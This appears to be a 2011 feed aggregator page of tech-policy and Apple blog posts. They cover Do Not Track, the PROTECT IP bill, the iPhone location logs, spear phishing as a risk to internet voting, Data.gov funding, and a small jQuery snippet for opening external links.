    Mon 16 May, 2011

    Channel Image18:31 Overstock's $1M Challenge» Freedom to Tinker

    As reported in Fast Company, RichRelevance and Overstock.com teamed up to offer up to a $1,000,000 prize for improving "its recommendation engine by 10 percent or more."

    If You Liked Netflix, You Might Also Like Overstock
    When I first read a summary of this contest, it appeared they were following in Netflix's footsteps right down to releasing user data sans names. This did not end well for Netflix's users or for Netflix. Narayanan and Shmatikov were able to re-identify Netflix users using the contest dataset, and their research contributed greatly to Ohm's work on de-anonimization. After running the contest a second time, Netflix terminated it early in the face of FTC attention and a lawsuit that they settled out of court.

    This time, Overstock is providing "synthetic data" to contest entrants, then testing submitted algorithms against unreleased real data. Tag line: "If you can't bring the data to the code, bring the code to the data." Hmm. An interesting idea, but short on a few details around the sharp edges that jump out as highest concern. I look forward to getting the time to play with the system and dataset. What is good news is seeing companies recognize privacy concerns and respond with something interesting and new. That is, at least, a move in the right direction.

    Place your bets now on which happens first: a contest winner with a 10% boost to sales, or researchers finding ways to re-identify at least 10% of the data?

    Sat 14 May, 2011

    Channel Image20:12 Debugging Legislation: PROTECT IP» Freedom to Tinker

    There's more than a hint of theatrics in the draft PROTECT IP bill (pdf, via dontcensortheinternet ) that has emerged as son-of-COICA, starting with the ungainly acronym of a name. Given its roots in the entertainment industry, that low drama comes as no surprise. Each section name is worse than the last: "Eliminating the Financial Incentive to Steal Intellectual Property Online" (Sec. 4) gives way to "Voluntary action for Taking Action Against Websites Stealing American Intellectual Property" (Sec. 5).

    Techdirt gives a good overview of the bill, so I'll just pick some details:

    • Infringing activities. In defining "infringing activities," the draft explicitly includes circumvention devices ("offering goods or services in violation of section 1201 of title 17"), as well as copyright infringement and trademark counterfeiting. Yet that definition also brackets the possibility of "no [substantial/significant] use other than ...." Substantial could incorporate the "merely capable of substantial non-infringing use" test of Betamax.
    • Blocking non-domestic sites. Sec. 3 gives the Attorney General a right of action over "nondomestic domain names", including the right to demand remedies from (A) domain name system server operators, (B) financial transaction providers, (C), Internet advertising services, and (D) "an interactive computer service (def. from 230(f)) shall take technically feasible and reasonable measures ... to remove or disable access to the Internet site associated with the domain name set forth in the order, or a hypertext link to such Internet site."
    • Private right of action. Sec. 3 and Sec. 4 appear to be near duplicates (I say appear, because unlike computer code, we don't have a macro function to replace the plaintiff, so the whole text is repeated with no diff), replacing nondomestic domain with "domain" and permitting private plaintiffs -- "a holder of an intellectual property right harmed by the activities of an Internet site dedicated to infringing activities occurring on that Internet site." Oddly, the statute doesn't say the simpler "one whose rights are infringed," so the definition must be broader. Could a movie studio claim to be hurt by the infringement of others' rights, or MPAA enforce on behalf of all its members? Sec. 4 is missing (d)(2)(D)
    • WHOIS. The "applicable publicly accessible database of registrations" gets a new role as source of notice for the domain registrant, "to the extent such addresses are reasonably available." (c)(1)
    • Remedies. The bill specifies injunctive relief only, not money damages, but threat of an injunction can be backed by the unspecified threat of contempt for violating one.
    • Voluntary action. Finally the bill leaves room for "voluntary action" by financial transaction providers and advertising services, immunizing them from liability to anyone if they choose to stop providing service, notwithstanding any agreements to the contrary. This provision jeopardizes the security of online businesses, making them unable to contract for financial services against the possibility that someone will wrongly accuse them of infringement. 5(a) We've already seen that it takes little to convince service providers to kick users off, in the face of pressure short of full legal process (see everyone vs Wikileaks, Facebook booting activists, and numerous misfired DMCA takedowns); this provision insulates that insecurity further.

    In short, rather than "protecting" intellectual and creative industry, this bill would make it less secure, giving the U.S. a competitive disadvantage in online business. (Sorry, Harlan, that we still can't debug the US Code as true code.)

    Tue 10 May, 2011

    Channel Image19:53 New iMac Best in Class» Apple Hot News
    CNET makes the new 27-inch iMac an Editors’ Choice (4/5 stars), writing that it “offers the best performance among current all-in-ones, along with the largest display, the best design, and exciting potential from its Thunderbolt ports.” Citing iMac’s competitive performance and price, CNET concludes that “for digital media professionals, or others in need of a fast, serious-minded all-in-one with a large display, we can make no other recommendation.”
    Channel Image19:50 Watching TV on an iPad» Apple Hot News
    At AllThingsD, tech columnist Walt Mossberg compiles a comprehensive list of apps for watching network and cable TV shows on iPad, including iTunes, Netflix, Hulu Plus, HBO GO, MLB.com At Bat, ABC Player, XFINITY TV, and WatchESPN. Mossberg notes that iPad’s many viewing app options — along with its thin and light design, immersive interface, large screen, and strong battery performance — make it “by far the best tablet for TV watching now.”
    Channel Image19:41 iMac Blows Away the Competition» Apple Hot News
    For its excellent performance, “gorgeous” design, and superior display, the new 21.5-inch iMac earns an editors’ rating of 8.9/10 from Computer Shopper, which makes it their overall top pick for an all-in-one desktop computer. Reporting that iMac blew most of the competition “straight off the test bench,” Computer Shopper recommends iMac to anyone focused on productivity and performance. They add: “With serious speed improvements and the promising new Thunderbolt port, the 2011 iMac keeps an iron grip on its position as today’s leading all-in-one PC.”

    Fri 06 May, 2011

    Channel Image21:32 In DHS Takedown Frenzy, Mozilla Refuses to Delete MafiaaFire Add-On» Freedom to Tinker

    Not satisfied with seizing domain names, the Department of Homeland Security asked Mozilla to take down the MafiaaFire add-on for Firefox. Mozilla, through its legal counsel Harvey Anderson, refused. Mozilla deserves thanks and credit for a principled stand for its users' rights.

    MafiaaFire is a quick plugin, as its author describes, providing redirection service for a list of domains: "We plan to maintain a list of URLs, and their duplicate sites (for example Demoniod.com and Demoniod.de) and painlessly redirect you to the correct site." The service provides redundancy, so that domain resolution -- especially at a registry in the United States -- isn't a single point of failure between a website and its would-be visitors. After several rounds of ICE seizure of domain names on allegations of copyright infringement -- many of which have been questioned as to both procedural validity and effectiveness -- redundancy is a sensible precaution for site-owners who are well within the law as well as those pushing its limits.

    DHS seemed poised to repeat those procedural errors here. As Mozilla's Anderson blogged: "Our approach is to comply with valid court orders, warrants, and legal mandates, but in this case there was no such court order." DHS simply "requested" the takedown with no such procedural back-up. Instead of pulling the add-on, Anderson responded with a set of questions, including:

    1. Have any courts determined that MAFIAAfire.com is unlawful or illegal inany way? If so, on what basis? (Please provide any relevant rulings)

    2. Have any courts determined that the seized domains related to MAFIAAfire.com are unlawful, illegal or liable for infringement in any way? (please provide relevant rulings)
    3. Is Mozilla legally obligated to disable the add-on or is this request based on other reasons? If other reasons, can you please specify.

    Unless and until the government can explain its authority for takedown of code, Mozilla is right to resist DHS demands. Mozilla's hosting of add-ons, and the Firefox browser itself, facilitate speech. They, like they domain name system registries ICE targeted earlier, are sometimes intermediaries necessary to users' communication. While these private actors do not have First Amendment obligations toward us, their users, we rely on them to assert our rights (and we suffer when some, like Facebook are less vigilant guardians of speech).

    As Congress continues to discuss the ill-considered COICA, it should take note of the problems domain takedowns are already causing. Kudos to Mozilla for bringing these latest errors to public attention -- and, as Tom Lowenthal suggests in the do-not-track context, standing up for its users.

    cross-posted at Legal Tags

    Channel Image20:01 A Showpiece E-Book for iPad» Apple Hot News
    Blogging in The New York Times, technology columnist David Pogue calls Our Choice — Al Gore’s new e-book app for iPad, iPhone, and iPod touch — “one of the most elegant, fluid, immersive apps you’ve ever seen.” Pogue notes that the Our Choice app updates Gore’s 2009 best-selling book about solving Earth’s climate crisis and that “the real magic” is in the visual elements, which include more than 400 pages of interactive photos, graphics, and video. Pogue concludes: “For once, here’s an e-book that really does redefine the net effect of an e-book.”
    Channel Image02:30 Summary of W3C DNT Workshop Submissions» Freedom to Tinker

    Last week, we hosted the W3C "Web Tracking and User Privacy" Workshop here at CITP (sponsored by Adobe, Yahoo!, Google, Mozilla and Microsoft). If you were not able to join us for this event, I hope to summarize some of the discussion embodied in the roughly 60 position papers submitted.

    The workshop attracted a wide range of participants; the agenda included advocates, academics, government, start-ups and established industry players from various sectors. Despite the broad name of the workshop, the discussion centered around "Do Not Track" (DNT) technologies and policy, essentially ways of ensuring that people have control, to some degree, over web profiling and tracking.

    Unfortunately, I'm going to have to expect that you are familiar with the various proposals before going much further, as the workshop position papers are necessarily short and assume familiarity. (If you are new to this area, the CDT's Alissa Cooper has a brief blog post from this past March, "Digging in on 'Do Not Track'", that mentions many of the discussion points. Technically, much of the discussion involved the mechanisms of the Mayer, Narayanan and Stamm IETF Internet-Draft from March and the Microsoft W3C member submission from February.)

    Read on for more...

    Technical Implementation: First, some quick background and updates: A number of papers point out how analogizing to a Do-Not-Call-like registry--I suppose where netizens would sign-up not to be tracked--would not work in the online tracking sense, so we should be careful not to shape the technology and policy too closely to Do-Not-Call. Having recognized that, the current technical proposals center around the Microsoft W3C submission and the Mayer et al. IETF submission, including some mix of a DNT HTTP header, a DNT DOM flag, and Tracking Protection Lists (TPLs). While the IETF submission focuses exclusively on the DNT HTTP Header, the W3C submission includes all three of these technologies. Browsers are moving pretty quickly here: Mozilla's FireFox v4.0 browser includes the DNT header, Microsoft's IE9 includes all three of these capabilities, Google's Chrome browser now allows extensions to send the DNT Header through the WebRequest API and Apple has announced that the next version of its Safari browser will support the DNT header.

    Some of the papers critique certain aspects of the three implementation options while some suggest other mechanisms entirely. CITP's Harlan Yu includes an interesting discussion of the problems with DOM flag granularity and access control problems when third-party code included in a first-party site runs as if it were first-part code. Toubiana and Nissenbaum talk about a number of problems with the persistence of DNT exceptions (where a user opts back in) when a resource changes content or ownership and then go on to suggest profile-based opting-back-in based on a "topic" or grouping of websites. Avaya's submission has a fascinating discussion of the problems with implementation of DNT within enterprise environments, where tracking-like mechanisms are used to make sure people are doing their jobs across disparate enterprise web-services; Avaya proposes a clever solution where the browser first checks to see if it can reach a resource only available internally to the enterprise (virtual) network, in which case it ignores DNT preferences for enterprise software tracking mechanisms. A slew of submissions from Aquin et al., Azigo and PDECC favor a culture of "self-tracking", allowing and teaching people to know more about the digital traces they leave and giving them (or their agents) control over the use and release of their personal information. CASRO-ESOMAR and Apple have interesting discussions of gaming TPLs: CASRO-ESOMAR points out that a competitor could require a user to accept a TPL that blocks traffic from their competitors and Apple talks about spam-like DNS cycling as an example of an "arms race" response against TPLs.

    Definitions: Many of the papers addressed definitions definitions definitions... mostly about what "tracking" means and what terms like "third-party" should mean. Many industry submissions such as Paypal, Adobe, SIIA, and Google urge caution so that good types of "tracking", such as analytics and forensics, are not swept under the rug and further argue that clear definitions of the terms involved in DNT is crucial to avoid disrupting user expectations, innovation and the online ecosystem. Paypal points out, as have others, that domain names are not good indicators of third-party (e.g., metrics.apple.com is the Adobe Omniture service for apple.com and fb.com is equivalent to facebook.com). Ashkan Soltani's submission distinguishes definitions for DNT that are a "do not use" conception vs. a "do not collect" conception and argues for a solution that "does not identify", requiring the removal of any unique identifiers associated with the data. Soltani points out how this has interesting measurement/enforcement properties as if a user sees a unique ID in the DNI case, the site is doing it wrong.

    Enforcement: Some raised the issue of enforcement; Mozilla, for example, wants to make sure that there are reasonable enforcement mechanisms to deal with entities that ignore DNT mechanisms. On the other side, so to speak, are those calling for self-regulation such as Comcast and SIIA vs. those advocating for explicit regulation. The opinion polling research groups, CASRO-ESOMAR, call explicitly for regulation no matter what DNT mechanism is ultimately adopted, such that DNT headers requests are clearly enforced or that TPLs are regulated tightly so as to not over-block legitimate research activities. Abine wants a cooperative market mechanism that results in a "healthy market system that is responsive to consumer outcome metrics" and that incentivizes advertising companies to work with privacy solution providers to increase consumer awareness and transparency around online tracking. Many of the industry players worried about definitions are also worried about over-prescription from a regulatory perspective; e.g., Datran Media is concerned about over-prescription via regulation that might stifle innovation in new business models. Hoofnagle et al. are evaluating the effectiveness of self-regulation, and find that the self-regulation programs currently in existence are greatly stilted in favor of industry and do not adequately embody consumer conceptions of privacy and tracking.

    Research: There were a number of submissions addressing research that is ongoing and/or further needed to gauge various aspects of the DNT puzzle. The submissions from McDonald and Wang et al. describe user studies focusing, respectively, on what consumers expect from DNT--spoiler: they expect no collection of their data--and gauging the usability and effectiveness of current opt-out tools. Both of these lines of work argue for usable mechanisms that communicate how developers implement/envision DNT and how users can best express their preferences via these tools. NIST's submission argues for empirical studies to set objective and usable standards for tracking protection and describes a current study of single sign-on (SSO) implementations. Thaw et al. discuss a proposal for incentivizing developers to communicate and design the various levels of rich data they need to perform certain kinds of ad targeting, and then uses a multi-arm bandit model to illustrate game-theoretic ad targeting that can be tweaked based on how much data they are allowed to collect. Finally, CASRO-ESOMAR makes a plea for exempting legitimate research purposes from DNT, so that opinion polling and academic research can avoid bias.

    Transparency: A particularly fascinating thread of commentary to me was the extent to which submissions touched on or entirely focused on issues of transparency in tracking. Grossklags argues that DNT efforts will spark increased transparency but he's not sure that will overcome some common consumer privacy barriers they see in research. Seltzer talks about the intimate relationship between transparency and privacy and concludes that a DNT header is not very transparent--in operation, not use--while TPLs are more transparent in that they are a user-side mechanism that users can inspect, change and verify correct operation. Google argues that there is a need for transparency in "what data is collected and how it is used", leaving out the ability for users to effect or controls these things. In contrast, BlueKai also advocates for transparency in the sense of both accessing a user's profile and user "control" over the data it collects, but it doesn't and probably cannot extend this transparency to an understanding how BlueKai's clients use this data. Datran Media describes their PreferenceCentral tool which allows opting out of brands the user doesn't want targeting them (instead of ad networks, with which people are not familiar), which they argue is granular enough to avoid the "creepy" targeting feeling that users get from behavioral ads and also allow high-value targeted advertising. Evidon analogizes to physical world shopping transactions and concludes, smartly, "Anytime data that was not explicitly provided is explicitly used, there is a reflexive notion of privacy violation." and "A permanently affixed 'Not Me' sign is not a representation of an engaged, meaningful choice."

    W3C vs. IETF: Finally, Mozilla seems to be the only submission that wrestles a bit with the "which standards-body?" question: W3C, IETF or some mix of both? They point out that the DNT Header is a broader issue than just web browsing so should be properly tackled by IETF where HTTP resides and the W3C effort could be focused on TPLs with a subcommittee for the DNT DOM element.

    Finally, here are a bunch of submissions that don't fit into the above categories that caught my eye:

    • Soghoian talks about the quantity and quality of information needed for security, law enforcement and fraud prevention is usually so big as to risk making it the exception that swallows the rule. Soghoian further recommends a total kibosh on certain nefarious technologies such as browser fingerprinting.

    • Lowenthal makes the very good point that browser vendors need to get more serious about managing security and privacy vulnerabilities, as that kind of risk can be best dealt with in the choke-point of the browsers that users choose, rather than the myriad of possible web entities. This would allow browsers to compete on privacy in terms of how privacy preserving they can be.

    • Mayer argues for a "generative" approach to a privacy choice signaling technology, highlighting that language preferences (via short codes) and browsing platform (via user-agent strings) are now sent as preferences in web requests and web sites are free to respond as they see fit. A DNT signaling mechanism like this would allow for great flexibility in how a web service responded to a DNT request, for example serving a DNT version of the site/resource, prompting the user for their preferences or asking for a payment before serving.

    • Yahoo points out that DNT will take a while to make it into the majority of browsers that users are using. They suggest a hybrid approach using the DAA CLEAR ad notice for backwards compatibility for browsers that don't support DNT mechanisms and the DNT header for an opt-out that is persistent and enforceable.

    Whew; I likely left out a lot of good stuff across the remaining submissions, but I hope that readers get an idea of some of the issues in play and can consult the submissions they find particularly interesting as this develops. We hope to have someone pen a "part 2" to this entry describing the discussion during the workshop and what the next steps in DNT will be.

    Thu 05 May, 2011

    Channel Image01:06 California to Consider Do Not Track Legislation» Freedom to Tinker

    This afternoon the CA Senate Judiciary Committee had a brief time for proponents and opponents of SB 761 to speak about CA's Do Not Track legislation. In general, the usual people said the usual things, with a few surprises along the way.

    Surprise 1: repeated discussion of privacy as a Constitutional right. For those of us accustomed to privacy at the federal level, it was a good reminder that CA is a little different.

    Surprise 2: TechNet compared limits on Internet tracking to Texas banning oil drilling, and claimed DNT is "not necessary" so legislation would be "particularly bad." Is Kleiner still heavily involved in the post-Wade TechNet?

    Surprise 3: the Chamber of Commerce estimated that DNT legislation would cost $4 billion dollars in California, extrapolated from an MIT/Toronto study in the EU. Presumably they mean Goldfarb & Tucker's Privacy Regulation and Online Advertising, which is in my queue to read. Comments on donottrack.us raise concerns. Assuming even a generous opt-out rate of 5% of CA Internet users, $4B sounds high based on other estimates of value of entire clickstream data for $5/month. I look forward to reading their paper, and to learning the Chamber's methods of estimating CA based on Europe.

    Surprise 4: hearing about the problems of a chilling effect -- for job growth, not for online use due to privacy concerns. Similarly, hearing frustrations about a text that says something "might" or "may" happen, with no idea what will actually transpire -- about the text of the bill, not about the text of privacy policies.

    On a 3 to 2 vote, they sent the bill to the next phase: the Appropriations Committee. Today's vote was an interesting start.

    Wed 04 May, 2011

    Channel Image23:35 GarageBand at Guitar Center» Apple Hot News
    Beginning May 7, you can visit any Guitar Center location and learn how to record and mix tracks using Mac and GarageBand. Guitar Center will present free “Recording Made Easy” workshops each Saturday from 10-11 a.m. in all of its 216 stores. Four different workshop sessions make it simple for even novice musicians to go from creating basic tracks to recording a finished song in GarageBand.

    Fri 29 April, 2011

    Channel Image20:02 The mysteriously disappearing WordPress 3.1 Admin Bar» scriptygoddess
    I've run into this problem a few times now and it always takes me a minute or two to remember what caused it and how to fix it. So first of all, if you have NEVER seen the admin bar, make sure you: 1) have it activated in your profile to show where you want [...] No related posts. Related posts brought to you by Yet Another Related Posts Plugin.

    Thu 21 April, 2011

    Channel Image01:52 Tracking Your Every Move: iPhone Retains Extensive Location History» Freedom to Tinker

    Today, Pete Warden and Alasdair Allan revealed that Apple’s iPhone maintains an apparently indefinite log of its location history. To show the data available, they produced and demoed an application called iPhone Tracker for plotting these locations on a map. The application allows you to replay your movements, displaying your precise location at any point in time when you had your phone. Their open-source application works with the GSM (AT&T) version of the iPhone, but I added changes to their code that allow it to work with the CDMA (Verizon) version of the phone as well.

    When you sync your iPhone with your computer, iTunes automatically creates a complete backup of the phone to your machine. This backup contains any new content, contacts, and applications that were modified or downloaded since your last sync. Beginning with iOS 4, this backup also included is a SQLite database containing tables named ‘CellLocation’, ‘CdmaCellLocaton’ and ‘WifiLocation’. These correspond to the GSM, CDMA and WiFi variants of location information. Each of these tables contains latitude and longitude data along with timestamps. These tables also contain additional fields that appear largely unused on the CDMA iPhone that I used for testing -- including altitude, speed, confidence, “HorizontalAccuracy,” and “VerticalAccuracy.”

    Interestingly, the WifiLocation table contains the MAC address of each WiFi network node you have connected to, along with an estimated latitude/longitude. The WifiLocation table in our two-month old CDMA iPhone contains over 53,000 distinct MAC addresses, suggesting that this data is stored not just for networks your device connects to but for every network your phone was aware of (i.e. the network at the Starbucks you walked by -- but didn’t connect to).

    Location information persists across devices, including upgrades from the iPhone 3GS to iPhone 4, which appears to be a function of the migration process. It is important to note that you must have physical access to the synced machine (i.e. your laptop) in order to access the synced location logs. Malicious code running on the iPhone presumably could also access this data.

    Not only was it unclear that the iPhone is storing this data, but the rationale behind storing it remains a mystery. To the best of my knowledge, Apple has not disclosed that this type or quantity of information is being stored. Although Apple does not appear to be currently using this information, we’re curious about the rationale for storing it. In theory, Apple could combine WiFi MAC addresses and GPS locations, creating a highly accurate geolocation service.

    The exact implications for mobile security (along with forensics and law enforcement) will be important to watch. What is most surprising is that this granularity of information is being stored at such a large scale on such a mainstream device.

    Wed 20 April, 2011

    Channel Image19:56 Oak Ridge, spear phishing, and i-voting» Freedom to Tinker

    Oak Ridge National Labs (one of the US national energy labs, along with Sandia, Livermore, Los Alamos, etc) had a bunch of people fall for a spear phishing attack (see articles in Computerworld and many other descriptions). For those not familiar with the term, spear phishing is sending targeted emails at specific recipients, designed to have them do an action (e.g., click on a link) that will install some form of software (e.g., to allow stealing information from their computers). This is distinct from spam, where the goal is primarily to get you to purchase pharmaceuticals, or maybe install software, but in any case is widespread and not targeted at particular victims. Spear phishing is the same technique used in the Google Aurora (and related) cases last year, the RSA case earlier this year, Epsilon a few weeks ago, and doubtless many others that we haven't heard about. Targets of spear phishing might be particular people within an organization (e.g., executives, or people on a particular project).

    In this posting, I’m going to connect this attack to Internet voting (i-voting), by which I mean casting a ballot from the comfort of your home using your personal computer (i.e., not a dedicated machine in a precinct or government office). My contention is that in addition to all the other risks of i-voting, one of the problems is that people will click links targeted at them by political parties, and will try to cast their vote on fake web sites. The scenario is that operatives of the Orange party send messages to voters who belong to the Purple party claiming to be from the Purple party’s candidate for president and giving a link to a look-alike web site for i-voting, encouraging voters to cast their votes early. The goal of the Orange party is to either prevent Purple voters from voting at all, or to convince them that their vote has been cast and then use their credentials (i.e., username and password) to have software cast their vote for Orange candidates, without the voter ever knowing.

    The percentage of users who fall prey to targeted attacks has been a subject of some controversy. While the percentage of users who click on spam emails has fallen significantly over the years as more people are aware of them (and as spam filtering has improved and mail programs have improved to no longer fetch images by default), spear phishing attacks have been assumed to be more effective. The result from Oak Ridge is one of the most significant pieces of hard data in that regard.

    According to an article in The Register, of the 530 Oak Ridge employees who received the spear phishing email, 57 fell for the attack by clicking on a link (which silently installed software in their computers using to a security vulnerability in Internet Explorer which was patched earlier this week – but presumably the patch wasn’t installed yet on their computers). Oak Ridge employees are likely to be well-educated scientists (but not necessarily computer scientists) - and hence not representative of the population as a whole. The fact that this was a spear phishing attack means that it was probably targeted at people with access to sensitive information, whether administrative staff, senior scientists, or executives (but probably not the person running the cafeteria, for example). Whether the level of education and access to sensitive information makes them more or less likely to click on links is something for social scientists to assess – I’m going to take it as a data point and assume a range of 5% to 20% of victims will click on a link in a spear phishing attack (i.e., that it’s not off by more than a factor of two).

    So as a working hypothesis based on this actual result, I propose that a spear phishing attack designed to draw voters to a fake web site to cast their votes will succeed with 5-20% of the targeted voters. With UOCAVA (military and overseas voters) representing around 5% of the electorate, I propose that a target of impacting 0.25% to 1% of the votes is not an unreasonable assumption. Now if we presume that the race is close and half of them would have voted for the "preferred" candidate anyway, this allows a spear phishing attack to capture an additional 0.12% to 0.50% of the vote.

    If i-voting were to become more widespread – for example, to be available to any absentee voter – then these numbers double, because absentee voters are typically 10% of all voters. If i-voting becomes available to all voters, then we can guess that 5% to 20% of ALL votes can be coerced this way. At that point, we might as well give up elections, and go to coin tossing.

    Considering the vast sums spent on advertising to influence voters, even for the very limited UOCAVA population, spear phishing seems like a very worthwhile investment for a candidate in a close race.

    Sun 10 April, 2011

    Channel Image23:30 Innovations update» David A. Wheeler's Blog

    I’ve made various updates to my list of The Most Important Software Innovations. I’ve added Distributed Version Control System (DVCS); these are all over now in the form of git, Mercurial (hg), Bazaar, Monotone, and so on, but these were influenced by the earlier BitKeeper, which was in turn influenced by the earlier Teamware (developed by Sun starting in 1991). As is often the case, “new” innovations are actually much older than people realize. I also added make, originally developed in 1977, and quicksort, developed in 1960-1961 by C.A.R. (Tony) Hoare. I’ve also improved lots of material that was already there, such as a better description of the history of the remote procedure call (RPC).

    So please enjoy The Most Important Software Innovations!

    Fri 08 April, 2011

    Channel Image05:24 What We Lose if We Lose Data.gov » Freedom to Tinker

    In its latest 2011 budget proposal, Congress makes deep cuts to the Electronic Government Fund. This fund supports the continued development and upkeep of several key open government websites, including Data.gov, USASpending.gov and the IT Dashboard. An earlier proposal would have cut the funding from $34 million to $2 million this year, although the current proposal would allocate $17 million to the fund.

    Reports say that major cuts to the e-government fund would force OMB to shut down these transparency sites. This would strike a significant blow to the open government movement, and I think it’s important to emphasize exactly why shuttering a site like Data.gov would be so detrimental to transparency.

    On its face, Data.gov is a useful catalog. It helps people find the datasets that government has made available to the public. But the catalog is really a convenience that doesn’t necessarily need to be provided by the government itself. Since the vast majority of datasets are hosted on individual agency servers—not directly by Data.gov—private developers could potentially replicate the catalog with only a small amount of effort. So even if Data.gov goes offline, nearly all of the data still exist online, and a private developer could go rebuild a version of the catalog, maybe with even better features and interfaces.

    But Data.gov also plays a crucial behind the scenes role, setting standards for open data and helping individual departments and agencies live up to those standards. Data.gov establishes a standard, cross-agency process for publishing raw datasets. The program gives agencies clear guidance on the mechanics and requirements for releasing each new dataset online.

    There’s a Data.gov manual that formally documents and teaches this process. Each agency has a lead Data.gov point-of-contact, who’s responsible for identifying publishable datasets and for ensuring that when data is published, it meets information quality guidelines. Each dataset needs to be published with a well-defined set of common metadata fields, so that it can be organized and searched. Moreover, thanks to Data.gov, all the data is funneled through at least five stages of intermediate review—including national security and privacy reviews—before final approval and publication. That process isn’t quick, but it does help ensure that key goals are satisfied.

    When agency staff have data they want to publish, they use a special part of the Data.gov website, which outside users never see, called the Data Management System (DMS). This back-end administrative interface allows agency points-of-contact to efficiently coordinate publishing activities agency-wide, and it gives individual data stewards a way to easily upload, view and maintain their own datasets.

    My main concern is that this invaluable but underappreciated infrastructure will be lost when IT systems are de-funded. The individual roles and responsibilities, the informal norms and pressures, and perhaps even the tacit authority to put new datasets online would likely also disappear. The loss of structure would probably mean that sharply reduced amounts of data will be put online in the future. The datasets that do get published in an ad hoc way would likely lack the uniformity and quality that the current process creates.

    Releasing a new dataset online is already a difficult task for many agencies. While the current standards and processes may be far from perfect, Data.gov provides agencies with a firm footing on which they can base their transparency efforts. I don’t know how much funding is necessary to maintain these critical back-end processes, but whatever Congress decides, it should budget sufficient funds—and direct that they be used—to preserve these critically important tools.

    Wed 06 April, 2011

    Channel Image23:24 Comparing Free/Libre/Open Source Software (FLOSS) with Charles River Bridge vs. Warren Bridge» David A. Wheeler's Blog

    I’ve been reading over an old court case and thinking about how it relates to the issue of government releasing free / libre / open source software (FLOSS). The case is Charles River Bridge v. Warren Bridge, 36 U.S. 420, including the final U.S. Supreme Court decision (United States Supreme Court reports, Vol. 9 (PDF page 773 on)). This is old; the decision was rendered in 1837. But I think it has interesting ramifications for today.

    Any lawyer will correctly tell you that you must not look at one court decision to answer a specific question. And any lawyer will tell you that the details matter; a case with different facts may have a different ruling. Fine. I’m not a lawyer anyway, and I am not trying to create a formal legal opinion (this is a blog, not a legal opinion!). But still, it’s useful to look at these pivotal cases and try to think about their wider implications. I think we should all think about what’s good (or not good) for our communities, and how we should help our governments enable that; that is not a domain exclusive to lawyers.

    So, what was this case all about? Wikipedia has a nice summary. Basically, in 1785 the Charles River Bridge Company was granted a charter to construct a bridge over the Charles River between Boston and Charleston. The bridge owners got quite wealthy from the bridge tolls, but the public was not so happy with having to keep paying and paying for such a key service. So Massachusetts allowed another company to build another bridge, the Warren bridge, next to the original Charles River bridge. What’s more, this second agreement stipulated that the Warren bridge would, after a certain time, be turned over to the state and be free for the public to use. The Charles River bridge owners were enraged — they knew that a free-to-use bridge would eliminate their profits. So they sued.

    As noted in Wikipedia, the majority decision (read by Taney) was that any charter contract should be interpreted as narrowly as possible. Since the Charles River Bridge contract did not explicitly guarantee exclusive rights, the Supreme Court held that they didn’t get exclusive rights. The Supreme Court also determined that, in general, public grants should be interpreted closely and if there is ever any uncertainty in a contract, the decision made should be one to better the public. Taney said, “While the rights of private property are sacredly guarded, we must not forget that the community also have rights, and that the happiness and well-being of every citizen depends on their faithful preservation.” In his remarks, Taney also explored what the negative effects on the country would be if the Court had sided with the Charles River Bridge Company. He stated that had that been the decision of the Court, transportation would be affected around the whole country. Taney made the point that with the rise of technology, canals and railroads had started to take away business from highways, and if charters granted monopolies to corporations, then these sorts of transportation improvements would not be able to flourish. If this were the case then, Taney said, the country would “be thrown back to the improvements of the last century, and obliged to stand still.”

    So how does this relate to FLOSS and government? Well first, let me set the stage, by pulling in a different strand of thought. The U.S. government pays to develop a lot of software. I think that in general, when “we the people” pay for software, then “we the people” should get it. The idea of paying for some software to be developed, and then giving long monopoly rights to a single company, seems to fly in the face of this. It doesn’t make sense from a cost viewpoint; when there’s a single monopoly supplier, the costs go up because there’s no effective competition! Some software shouldn’t be released to the public at all, but that is what classification and export controls are supposed to deal with. I’m sure there are exceptions, but currently we assume that when “we the people” pay to develop software, then “we the people” do not get the software, and that is absurd. If someone wants to have exclusive rights to some software, then he should spend all his time and money to develop it.

    A fair retort to my argument is, “But does the government have the right to take an action that might put reduce the profits of a business, or put it out of business?” In particular, if the government paid to develop software, can the government release that software as FLOSS if a private company sells equivalent proprietary software? After all, that private company would suddenly find itself competing with a less-expensive or free product!

    Examining all relevant legal cases about this topic (releasing FLOSS when there is an existing proprietary product) would be daunting; I don’t pretend to have done that analysis. (If someone has done it, please tell me!) However, I think Charles River Bridge v. Warren Bridge can at least shed some light and is interesting to think about. After all, this is a major Supreme Court decision, so the ruling should be able to help us think about the issue of the government enabling a free service that competes with an existing business. In this case, the government knowingly created a competing free service, and as a result an existing business would no longer be able to make money from something it did have rights to. There were a lot of people who had bought stock in the first company, for a lot of money, and those stock holders expected to reap massive returns from their monopoly on an important local service. There were also a lot of ordinary citizens who were unhappy about this local monopoly, and wanted to get rid of the monopoly. There is another interesting similarity between the bridge case and the release of FLOSS: the government did not try to take away the existing bridge, instead, they enabled the re-development of a competing bridge. While it’s not the last word, this case about bridges can (I think) help us think about whether governments can release FLOSS if there’s already a proprietary program that does the same thing.

    I would certainly agree that governments shouldn’t perform an action with the sole or primary purpose of putting a company out of business. But when governments release FLOSS they usually are not trying to put a proprietary company out of business as their primary purpose. In the case of Charles River Bridge vs. Warren Bridge, the government took action not because it wanted to put a company out of business, but because it wanted to help the public (in this case, by reducing use costs for key infrastructure). At least in this case, the Supreme Court clearly decided that a government can do something even if it hurts the profitability of some business. If they had ruled otherwise, government would be completely hamstrung; almost all government actions help someone and harm someone else. The point should be that the government should be trying to aid the community as a whole.

    I think a reasonable take-away message from this case is that government should focus on the rights, happiness, and well-being of the community as a whole, even if some specific group would make less money — and that helping the community may involve making some goods or services (like FLOSS!) available at no cost.

    Channel Image21:38 launch all external links in a new window with jQuery» scriptygoddess
    This is a really simple piece of jquery that will launch all external links on the page in a new window. jQuery(document).ready(function(){ jQuery("a[href*='http://']:not([href*='http://yourdomain.com'])").attr("target","_blank"); jQuery("a[href*='https://']:not([href*='https://yourdomain.com'])").attr("target","_blank"); }); Updated to add: Here is a modification in case you want to allow links to subdomains to open in the same window… jQuery("a[href*='http://']:not([href*='http://yourdomain.com'])").not("[href^='http://subdomain.yourdomain.com']").attr("target","_blank"); Another update Here is another modification that [...] No related posts. Related posts brought to you by Yet Another Related Posts Plugin.

    Mon 04 April, 2011

    Channel Image14:45 Why seals can't secure elections» Freedom to Tinker

    Over the last few weeks, I've described the chaotic attempts of the State of New Jersey to come up with tamper-indicating seals and a seal use protocol to secure its voting machines.

